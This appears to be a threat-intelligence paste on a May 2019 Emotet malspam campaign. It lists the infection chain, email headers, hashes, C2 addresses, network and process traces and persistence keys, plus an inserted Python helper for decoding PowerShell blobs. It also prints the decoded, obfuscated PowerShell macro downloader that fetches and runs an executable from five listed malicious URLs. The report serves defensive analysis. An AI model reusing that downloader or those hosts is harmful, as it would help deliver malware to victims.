VRad

#emotet_150519

May 16th, 2019
#IOC #OptiData #VR #emotet #W97M #macro #WMI #powershell

https://pastebin.com/F520pqQW

previous_contact:
28/01/19 https://pastebin.com/z2TDfM7s
23/01/18 https://pastebin.com/D9TDts5J
20/12/18 https://pastebin.com/EejcbL4t
04/12/18 https://pastebin.com/znQDtbnt
09/11/18 https://pastebin.com/THHMs2wg
01/10/18 https://pastebin.com/Y6DnbpHv

FAQ:

attack_vector
--------------
email attach .doc > macro > WMI > powershell -enc > GET 5 URL > \Users\%name%\206.exe > C:\Users\%name%\AppData\Local\?\?.exe

email_headers
--------------
Received: from diossa.com.mx (u21557617.onlinehome-server.com [198.251.79.161])
Received: from [24.51.132.88] (unknown [24.51.132.88]) by diossa.com.mx (Postfix)
Date: Wed, 15 May 2019 17:00:50 -0500
From: Севернюк Татьяна <ventas_tpc@diossa.com.mx>
To: <user00@victim01>
Subject: RE: RE: Ціновий запит_комплектація для санвузла

files
--------------
SHA-256 e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee
File name DATA-916228-2122097647.doc [Composite Document File V2 Document, Application: Microsoft Office Word]
File size 145.13 KB (148608 bytes)

SHA-256 4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2
File name l4gktj_307970247.exe [PE32 executable (GUI) Intel 80386, for MS Windows] .!..L.!This program cannot be run in DOS mode.
File size 75 KB (76800 bytes)

activity
**************
macro_ps_b64_decoded:
--------------
$d76278='G655408';$H8_55169 = '206';$r8274_42='X16181_';$W_4_77=$env:userprofile+'\'+$H8_55169+'.exe';$R57_3513='E8329_3';$F64254=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;$i93085='http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/@http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/@https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/@http://adsprout[.] co/wp/oMrTbPUxE/@http://springhelp[.] co[.] za/wp/jMSZNshHRf/'.spLIt('@');$L60586_1='l3_9674';foreach($u0210836 in $i93085){try{$F64254.doWnLOAdFIle($u0210836, $W_4_77);$v34879_9='n2511836';If ((&('Get'+'-It'+'em') $W_4_77).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $W_4_77;$O5_0_23='f58719_0';break;$m882344='F3145289'}}catch{}}$j7906445='N9535207'
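Triage helper, added here as an example and not part of the original paste: the `powershell.exe -enc` argument seen in the proc list is UTF-16LE text wrapped in base64, and the decoded macro payload above hides its cmdlets behind string concatenation (`('n'+'ew'+'-object')`) and backtick splicing. The script below reverses both layers, pulls out the download URL list (split on `@`), the minimum-size check before `Invoke-Item`, and the real cmdlet names, and defangs the URLs the way this paste does. The encoded input is a constructed sample that mirrors the structure of the decoded macro with `example.*` placeholder hosts; the real blob in the paste is truncated and is not reproduced.

```python
import base64
import re

# Constructed sample with the same shape as the decoded macro payload:
# URL list split on '@', download to %userprofile%\<n>.exe, size check, Invoke-Item.
# Hosts are example.* placeholders, not the real infrastructure.
SAMPLE_PS = (
    "$p=$env:userprofile+'\\'+'206'+'.exe';"
    "$w=.('n'+'ew'+'-object') nET.W`EBCl`I`e`NT;"
    "$u='http://a.example.com/wp-includes/x/@https://b.example.org/wp-content/y/'.spLIt('@');"
    "foreach($x in $u){try{$w.doWnLOAdFIle($x,$p);"
    "If ((&('Get'+'-It'+'em') $p).LeNgTh -ge 20603) {.('I'+'n'+'voke-'+'Item') $p;break}}catch{}}"
)

# ('a'+'b'+'c')  -> 'abc'   (parenthesised run of single-quoted literals joined by +)
CONCAT = re.compile(r"\((?:'[^']*'\s*\+\s*)+'[^']*'\)")


def encode_powershell_arg(script):
    """Produce what `powershell.exe -enc` expects: UTF-16LE text, base64 encoded."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_powershell_arg(blob):
    """Reverse of -enc: base64 decode, then UTF-16LE decode to script text."""
    return base64.b64decode(blob).decode("utf-16-le")


def unsplice(text):
    """Undo the two obfuscation tricks used in the macro: backtick splicing and + concatenation."""
    text = text.replace("`", "")  # nET.W`EBCl`I`e`NT -> nET.WEBClIeNT

    def join(match):
        return "'" + "".join(re.findall(r"'([^']*)'", match.group(0))) + "'"

    return CONCAT.sub(join, text)


def defang(url):
    """Render a URL in the paste's non-clickable style: hxxp:// and [.] in the host."""
    scheme, rest = url.split("://", 1)
    host, sep, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + "://" + host.replace(".", "[.]") + (sep + path if sep else "")


def triage(blob):
    """Decode an -enc blob and extract the indicators a responder wants first."""
    script = unsplice(decode_powershell_arg(blob))
    urls = re.findall(r"https?://[^'\"@\s]+", script)
    size = re.search(r"\.length\s+-ge\s+(\d+)", script, re.IGNORECASE)
    # After unsplicing, invoked cmdlets appear as .'Name-Verb' or &'Name-Verb'
    cmdlets = re.findall(r"[.&]'([A-Za-z]+-[A-Za-z]+)'", script)
    return {
        "urls": urls,
        "defanged": [defang(u) for u in urls],
        "min_size": int(size.group(1)) if size else None,
        "cmdlets": cmdlets,
        "script": script,
    }


if __name__ == "__main__":
    result = triage(encode_powershell_arg(SAMPLE_PS))
    for line in result["defanged"]:
        print("PL_SCR", line)
    print("min size before Invoke-Item:", result["min_size"])
    print("cmdlets:", ", ".join(result["cmdlets"]))
```

The size check is worth keeping in a triage note: the downloader only executes the file if it is at least that many bytes, so a sinkhole or error page served in place of the payload is silently skipped and the next URL is tried, which is why the `netwrk` section shows a GET to the first host only.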

PL_SCR 5 / 5
--------------
http://tomasoleksak[.] com/wp-includes/zm2ga7ha2l_5q8wl-2798/
http://mmassyifa[.] com/wp-content/d3ntkm81gs_5129qfvt2i-244324062/
https://aaliotti[.] esp-monsite[.] org/wp-content/6orh12qu_7dsv031ip-0075691/
http://adsprout[.] co/wp/oMrTbPUxE/
http://springhelp[.] co[.] za/wp/jMSZNshHRf/

C2
--------------
78.188.7.213:8090
138.68.13.161:8080

netwrk
--------------
37.9.175.14 tomasoleksak{.} com GET /wp-includes/zm2ga7ha2l_5q8wl-2798/ HTTP/1.1 no User Agent (!)
78.188.7.213 78.188.7.213:8090 POST /health/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0
138.68.13.161 138.68.13.161:8080 POST /loadan/enable/stubs/merge/ HTTP/1.1 (application/x-www-form-urlencoded) Mozilla/4.0

comp
--------------
powershell.exe 2632 TCP localhost 49539 37.9.175.14 80 ESTABLISHED
eventssmall.exe 2108 TCP localhost 49540 90.57.69.215 80 SYN_SENT
eventssmall.exe 2108 TCP localhost 49542 191.92.69.115 80 SYN_SENT
eventssmall.exe 2108 TCP localhost 49544 75.177.169.225 80 SYN_SENT
eventssmall.exe 2108 TCP localhost 49546 78.188.7.213 8090 ESTABLISHED
eventssmall.exe 2108 TCP localhost 49547 207.44.45.27 22 SYN_SENT
eventssmall.exe 2108 TCP localhost 49548 138.68.13.161 8080 ESTABLISHED

proc
--------------
"C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
... [another context]
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -enc JABkADcAN...==
C:\Users\operator\206.exe
C:\Users\operator\206.exe --d4ba2bdd
C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe
C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe --21b679c3

persist
--------------
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 16.05.2019 11:08
eventssmall
c:\users\operator\appdata\local\eventssmall\eventssmall.exe 03.09.2012 12:06

drop
--------------
%temp%\VBE\
%temp%\Word8.0\MSForms.exd
C:\Users\operator\206.exe [removed]
C:\Users\operator\AppData\Local\eventssmall\eventssmall.exe

# # #

https://www.virustotal.com/gui/file/4fd7e69b107fe0c6493339f845a3c6482f6ab370f35952a13bff026b6c9a7cf2/details
https://www.virustotal.com/gui/file/e47f8c73b71b01c3afa583d966d945f3b464a362aeb50175f69b01d2210083ee/details
https://analyze.intezer.com/#/analyses/8f8911d3-7fb2-4e0d-9073-6c178d68c3ef

VR